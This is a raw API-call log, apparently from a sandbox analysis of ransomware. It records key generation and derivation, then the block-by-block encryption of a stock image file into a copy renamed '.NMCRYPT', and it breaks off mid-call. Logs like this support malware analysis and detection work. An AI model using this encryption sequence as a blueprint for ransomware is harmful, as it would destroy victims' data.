1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.248] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.248] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0165.248] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.248] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad278) returned 1 [0165.248] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0165.248] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0165.248] wcslen (_String="\\\\?\\") returned 0x4 [0165.248] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad438) returned 1 [0165.248] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0165.249] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0165.249] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=15776) returned 1 [0165.249] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0165.249] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.251] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.251] GetLastError () returned 0x0 [0165.251] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.269] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.269] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.269] GetLastError () returned 0x0 [0165.269] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.269] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.269] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.269] GetLastError () returned 0x0 [0165.269] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.269] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.269] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.270] GetLastError () returned 0x0 [0165.270] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.270] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.270] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.270] GetLastError () returned 0x0 [0165.270] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.270] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.270] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.270] GetLastError () returned 0x0 [0165.270] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.270] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.270] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.270] GetLastError () returned 0x0 [0165.270] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.270] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.270] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.270] GetLastError () returned 0x0 [0165.270] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.270] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.270] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.270] GetLastError () returned 0x0 [0165.270] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.270] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.270] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.270] GetLastError () returned 0x0 [0165.270] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.271] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.271] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.271] GetLastError () returned 0x0 [0165.271] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.271] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.271] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.271] GetLastError () returned 0x0 [0165.271] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.271] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.271] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.271] GetLastError () returned 0x0 [0165.271] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.271] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.271] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.271] GetLastError () returned 0x0 [0165.271] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.271] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.271] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.271] GetLastError () returned 0x0 [0165.271] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.271] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.271] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.271] GetLastError () returned 0x0 [0165.271] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.272] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.273] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.273] GetLastError () returned 0x0 [0165.273] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.273] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.273] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.273] GetLastError () returned 0x0 [0165.273] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.273] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.273] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.273] GetLastError () returned 0x0 [0165.273] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.273] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.273] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.273] GetLastError () returned 0x0 [0165.273] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.273] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.273] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.273] GetLastError () returned 0x0 [0165.273] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.273] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.273] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.273] GetLastError () returned 0x0 [0165.273] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.274] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.274] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.274] GetLastError () returned 0x0 [0165.274] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.274] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.274] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.274] GetLastError () returned 0x0 [0165.274] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.274] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.274] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.274] GetLastError () returned 0x0 [0165.274] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.274] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.274] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.274] GetLastError () returned 0x0 [0165.274] WriteFile (in: hFile=0x15c4, 